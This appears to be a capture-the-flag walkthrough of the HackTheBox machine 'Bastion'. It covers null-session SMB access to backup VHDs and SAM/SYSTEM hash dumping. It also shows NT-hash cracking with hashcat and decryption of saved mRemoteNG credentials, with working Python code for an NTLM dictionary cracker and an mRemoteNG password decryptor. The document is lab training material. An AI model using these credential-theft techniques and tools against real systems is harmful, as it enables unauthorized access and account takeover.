
Bastion HTB Walkthrough

Bastion is an easy HackTheBox Windows machine. In this article we are going to see how to get the user and root flags. Please follow along step by step, and I hope everything will be clear!

Let's start with our first scan:

1. Nmap result

Scanning with nmap gives us these results:

22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

SSH is open, and so are the SMB ports, so it's time for enumeration. Let's list the shares with smbclient (-N means no password, i.e. a null session):

$ smbclient -N -L //10.129.136.29

        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

It looks like we have an interesting share named "Backups", and it is readable without credentials. Listing it gives:

$ smbclient -N \\\\10.129.136.29\\backups
note.txt                         
SDT65CB.tmp             
WindowsImageBackup

Let's dive further, into the "WindowsImageBackup" folder:

L4mpje-PC
├── Backup 2019-02-22 124351
├── Catalog
├── MediaId
└── SPPMetadataCache

Looking inside "Backup 2019-02-22 124351", we find two big VHD files that we couldn't download at first. After some googling we managed to pull the entire "backups" share with this command, which enlarges the socket buffers and raises the timeout so the transfer of the large files does not get cut off:

$ smbclient  \\\\MACHINE_IP\\backups --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 3600 

The download is still far too slow, so I decided to mount the share instead (null session again, with an empty user and password):

$ sudo mkdir -p /mnt/bastion
$ sudo mount -t cifs //MACHINE_IP/backups /mnt/bastion -o user=,password=

With the share mounted there is no need to copy the VHDs at all: I mounted the two big VHD files on my machine straight from the share, following this tutorial (the usual tool for this is guestmount from libguestfs-tools; mount them read-only so nothing inside the image is modified).

2. Exploitation and User flag

Once the VHDs are mounted, we copy the "SAM" and "SYSTEM" registry hives out of the image; they live in Windows/System32/config on the volume that contains the Windows directory. On a live system these files are locked by the OS, which is why a shadow copy is normally needed, but a backup image hands them to us directly. SYSTEM holds the boot key that the SAM hashes are encrypted with, so we need both.

We dump the password hashes from those two hives with samdump2:

$ samdump2 SYSTEM SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Great, we have some interesting information. The lines are in pwdump format (user:RID:LM hash:NT hash). The LM field is the fixed "aad3b435..." value on every account, meaning LM hashing is disabled, and the NT hash "31d6cfe0..." is the hash of an empty password, so the two disabled accounts have nothing to crack. Let's put the NT hashes in a file and pass it to hashcat with mode 1000 (NTLM):

$ hashcat -m 1000 samhash /usr/share/wordlists/rockyou.txt

31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
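To see what hashcat is actually doing with mode 1000, here is an added Python example; it is not code from the original post and not part of any tool used above. It parses the samdump2 output shown above, separates the empty-password entries from the one hash worth cracking, produces the hash list that would go into the "samhash" file, and then runs a small dictionary attack by recomputing NT hashes (MD4 over the UTF-16LE encoding of the candidate password) in pure Python, because hashlib on OpenSSL 3 builds often no longer provides md4. The wordlist is a constructed four-word stand-in for rockyou.txt.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of "": the account has no password

# samdump2 output copied from the walkthrough, used here as the sample input
SAMDUMP2_OUTPUT = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""
# constructed four-word stand-in for rockyou.txt
WORDLIST = ["password", "bureaulamp", "L4mpje", "bureaulampje"]


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 in pure Python."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = [  # (boolean function, additive constant, X[k] order, shift schedule)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = ((j - i) % 4 for j in range(4))  # rotate the a/b/c/d roles each step
                v[a] = _rotl((v[a] + func(v[b], v[c], v[d]) + x[k] + const) & MASK, shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; this is what hashcat -m 1000 recomputes."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse samdump2/pwdump lines of the form [*disabled*] user:rid:lmhash:nthash:::"""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
                        "lm_disabled": lm.lower() == EMPTY_LM, "disabled": disabled})
    return entries


def hashcat_input(entries: list) -> list:
    """Lines for the hash file handed to hashcat -m 1000: NT hashes only, skipping empty passwords."""
    return [e["nt"] for e in entries if e["nt"] != EMPTY_NT]


def crack(entries: list, wordlist: list) -> dict:
    """Dictionary attack: hash every candidate once, then look each account's NT hash up."""
    candidates = {nt_hash(w): w for w in wordlist}
    found = {}
    for e in entries:
        if e["nt"] == EMPTY_NT:
            found[e["user"]] = ""  # no password set (both such accounts are disabled here)
        elif e["nt"] in candidates:
            found[e["user"]] = candidates[e["nt"]]
    return found


if __name__ == "__main__":
    entries = parse_pwdump(SAMDUMP2_OUTPUT)
    print("hashcat input:", hashcat_input(entries))
    for user, pw in crack(entries, WORDLIST).items():
        print(f"{user}: {pw!r}")
```

Hashing each candidate once and looking the account hashes up in a dictionary is the same shape as what hashcat does at scale; the speed difference comes from the GPU, not from the algorithm, which is why an unsalted MD4 of the password is such a weak protection for anything found in a wordlist.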

Great! SSH is open, so we can log in with the credentials "L4mpje:bureaulampje" and read the user flag:

$ ssh L4mpje@MACHINE_IP

3. Root Flag

After enumerating the box, we find mRemoteNG installed. It keeps its saved connections in "confCons.xml", with each password encrypted under the user's master password; that password is a fixed default unless the user changed it, so the file can be decrypted offline. We grabbed the file and used this Python script to decrypt its contents:

https://github.com/gquere/mRemoteNG_password_decrypt

We copy the file to our machine with scp (the path is relative to the user's home directory on the Windows side):

$ scp L4mpje@MACHINE_IP:../../../Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .

Then we decrypt the file with the script:

$ python mremoteng_decrypt.py  confCons.xml

Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2

Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampje
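For readers who want to understand what the decrypt script is doing rather than just run it, here is an added Python example; it is neither the linked script nor code from the original post. It assumes the confCons.xml format mRemoteNG has used since version 1.75: each Password attribute is base64(salt[16] || nonce[16] || AES-256-GCM ciphertext || tag[16]), the key is derived from the master password (default "mR3m") with PBKDF2-HMAC-SHA1 using the KdfIterations count stored on the root element, and the salt doubles as the GCM associated data. It needs the `cryptography` package (pycryptodome is used as a fallback), and it builds a constructed confCons.xml with the two connections from the output above so it runs offline; pass a real file path as the first argument to decrypt that instead.

```python
import base64
import hashlib
import os
import sys
import xml.etree.ElementTree as ET

MASTER_PASSWORD = "mR3m"   # mRemoteNG's built-in default when the user set no master password
SALT_LEN = NONCE_LEN = TAG_LEN = 16
KEY_LEN = 32               # AES-256
DEFAULT_ITERATIONS = 1000  # mRemoteNG's default KdfIterations


def _aes_gcm(key: bytes, nonce: bytes, aad: bytes, data: bytes, encrypt: bool) -> bytes:
    """AES-GCM via `cryptography`, falling back to pycryptodome. `data` is ct||tag when decrypting."""
    try:
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
        aead = AESGCM(key)
        return aead.encrypt(nonce, data, aad) if encrypt else aead.decrypt(nonce, data, aad)
    except ImportError:
        from Crypto.Cipher import AES
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        if encrypt:
            ct, tag = cipher.encrypt_and_digest(data)
            return ct + tag
        return cipher.decrypt_and_verify(data[:-TAG_LEN], data[-TAG_LEN:])


def derive_key(password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA1 with a 32-byte output, matching mRemoteNG's PKCS#5 v2 key derivation."""
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, iterations, KEY_LEN)


def decrypt_password(blob_b64: str, password: str = MASTER_PASSWORD,
                     iterations: int = DEFAULT_ITERATIONS) -> str:
    """Password attribute layout: base64(salt[16] || nonce[16] || ciphertext || tag[16])."""
    raw = base64.b64decode(blob_b64)
    salt = raw[:SALT_LEN]
    nonce = raw[SALT_LEN:SALT_LEN + NONCE_LEN]
    ct_and_tag = raw[SALT_LEN + NONCE_LEN:]
    key = derive_key(password, salt, iterations)
    # the salt is also the GCM associated data, so a tampered salt fails authentication
    return _aes_gcm(key, nonce, salt, ct_and_tag, encrypt=False).decode("utf-8")


def encrypt_password(plaintext: str, password: str = MASTER_PASSWORD,
                     iterations: int = DEFAULT_ITERATIONS) -> str:
    """Inverse of decrypt_password; only needed here to build the constructed sample file."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    key = derive_key(password, salt, iterations)
    sealed = _aes_gcm(key, nonce, salt, plaintext.encode("utf-8"), encrypt=True)
    return base64.b64encode(salt + nonce + sealed).decode("ascii")


def decrypt_config(xml_text: str, password: str = MASTER_PASSWORD) -> list:
    """Walk every Connection node (including ones nested in Containers) and decrypt its password."""
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", DEFAULT_ITERATIONS))
    creds = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        blob = node.get("Password", "")
        creds.append({"name": node.get("Name"), "hostname": node.get("Hostname"),
                      "username": node.get("Username"),
                      "password": decrypt_password(blob, password, iterations) if blob else ""})
    return creds


def build_sample_config() -> str:
    """Constructed confCons.xml holding the two connections recovered in the walkthrough."""
    conns = [("DC", "127.0.0.1", "Administrator", "thXLHM96BeKL0ER2"),
             ("L4mpje-PC", "192.168.1.75", "L4mpje", "bureaulampje")]
    nodes = "".join(f'<Node Name="{n}" Type="Connection" Hostname="{h}" Username="{u}" '
                    f'Password="{encrypt_password(p)}" />' for n, h, u, p in conns)
    return ('<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" '
            f'EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="{DEFAULT_ITERATIONS}" '
            f'FullFileEncryption="false" ConfVersion="2.6">{nodes}</mrng:Connections>')


if __name__ == "__main__":
    # usage: python mrng_decrypt.py [confCons.xml]   (no argument: decrypt the constructed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8-sig") as fh:
            xml_text = fh.read()
    else:
        xml_text = build_sample_config()
    for c in decrypt_config(xml_text):
        print(f"{c['name']}: {c['username']}@{c['hostname']} -> {c['password']}")
```

The cryptography itself is sound (authenticated AES-256-GCM, per-entry salt and nonce); the weakness is purely in key management: with no user-chosen master password the key is derived from a constant that ships with the program, so anyone who can read the file can decrypt it. The `KdfIterations` value is read from the file because a user can raise it in the settings, and a different master password is passed straight through to `derive_key`.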

Perfect! The "DC" entry points at 127.0.0.1, so it is a saved login to the box itself as Administrator. We log in with "Administrator:thXLHM96BeKL0ER2" (SSH works for this account too) and read the root flag from the Administrator's desktop.


Finally! We managed to hack this easy Windows machine, and I hope you will too by following these steps.

If you have any question or detail to add, please feel free to contact me here.